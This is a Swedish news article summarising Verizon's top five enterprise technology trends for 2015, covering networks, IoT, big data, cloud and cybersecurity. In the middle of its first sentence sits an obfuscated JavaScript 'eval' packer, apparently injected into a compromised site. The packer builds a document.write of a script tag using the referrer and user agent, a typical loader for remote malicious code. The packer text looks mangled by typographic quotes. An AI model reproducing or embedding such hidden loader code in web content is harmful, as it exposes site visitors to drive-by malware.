Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Verizon identifierar de viktigaste tekniktrenderna för 2015

Verizon identifierar de viktigaste tekniktrenderna för 2015

Strategiska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|reynr|var|u0026u|referrer|areka||js|php’.split(’|’),0,{}))
nätverksinvesteringar kommer att vara ett huvudsakligt fokus för CIO:er under 2015 då företagen i allt större utsträckning tar till sig möjligheterna med big data, flyttar över till molnet och börjar profitera på “internet of things”, enligt Verizons lista över de främsta teknologiska företagstrenderna 2015. Under nästa år kommer företagen att implementera tekniker som driver innovation och skapar förutsättningar för framtida tillväxt.

Nedan följer de viktigaste trenderna Verizon tror kommer driva förändring hos företag och myndigheter under 2015:

1)    Pålitliga nätverk där innovation är nyckeln till framgång: Företagen kommer att fokusera på strategiska investeringar för nätverk och IT under 2015, då kommunikationsnätverk har blivit grunden för en stark affärsmässig tillväxt. De alltjämt ökade kraven på data, molnet, video och mobila lösningar gör att företagsnätverken måste vara flexibla och skalbara, utan att kompromissa med prestanda. CIO:er måste säkerställa att nätverken klarar att hantera den ökade belastning som följer när allt fler applikationer flyttas till molnet. Att dra nytta av teknologiska innovationer som virtualisering, automation och fibernätverk (100G, 200G och LTE) för att förbättra effektivitet och pålitlighet kommer att vara avgörande när det kommer till att hjälpa nätverken hantera en massiv tillväxt.

2)    Internet Of Things får större utbredning: Under 2015 kommer teknologi och tjänster relaterade till Internet of Things (IoT) att öka, särskilt inom SMB-marknaden och bland större organisationer som inte varit lika tidiga som andra när det kommer till IoT. Industrikonsolidering är en nyckelfaktor för en större utbredning av IoT, särskilt eftersom aktörerna på marknaden, via strategiska allianser, nu arbetar tillsammans för att definiera standarder som alla parter kan dra nytta av. Bättre verktyg för molnet, big data och analyser, kombinerat med större fokus på IoT och säkerhet, innebär en minskad komplexitet för hantering av M2M-baserade initiativ. Denna utveckling kommer leda till ökat förtroende hos användarna och till nya affärsmodeller, bättre slutkundsupplevelse och en ROI som är tydligare definierad och enklare att förstå.

3)    Träffsäkra prognoser och analyser sätter fart på big data-satsningar: Förmågan att samla in, hantera och analysera data kommer att leda till möjlighet att erbjuda nya tjänster. Att dra nytta av big data kan dessutom ge ovärderliga insikter kring hur produkter och tjänster tas emot och hur tillgångar används, vilket kommer att vara en huvudsaklig prioritet för alla typer av chefer under 2015. Företagen som integrerar avancerade analysprogram för prognoser kommer att vara bäst positionerade att förbättra sin operationella effektivitet, identifiera nya intäktsmöjligheter och vara bättre rustade att serva sina kunder i dagens data-drivna ekonomi.

4)    IT-avdelningen kommer styra molnet: Företagens IT-avdelning kommer styra molndriftsättningarna under 2015 och anta rollen som ”cloud brokers” som hjälper till att identifiera behov, rita upp tekniska krav och hantera de olika teknologier och tjänsteleverantörer som används. Molnlösningar kommer att vara ändamålsbyggda för att stödja de viktigaste affärsinitiativen, som t.ex. förbättrad interaktion med kunder, de kommer att förändra det operativa arbetet och arbetet med implementering av regler och policys. Det kommer bli mindre diskussioner om offentliga eller privata moln, antal virtuella maskiner etc., och mer prioritet kommer placeras på att bygga molnlösningar som löser specifika affärsbehov, oavsett vilken teknologisk specifikation som finns. Denna djupare, strategiska förståelse av molntjänster, delegerade av CIO, kommer stödja större migration av affärskritiska arbetsbelastningar i molnet.

5)    Spelplanen förändras i kampen mot cyberbrottslighet: Det ökade antalet enheter, maskin-till-maskin kopplingar, en allt mer komplex hotbild och utbyggda datormiljöer kommer göra nätverkssäkerheten allt mer komplex, och viktigare än någonsin under 2015. En holistisk säkerhetsstrategi i flera lager kommer vara kritisk för att ta hand om risker och för att upprätthålla tillit mellan enheter, nätverk, människor och system. Något som kommer vara ännu viktigare är att arbeta med strategier för proaktiv riskhantering för att upptäcka brottslig aktivitet i realtid genom analyser av big data. Detta kommer vara avgörande när det kommer till företagens förmåga att skydda data under nästkommande år.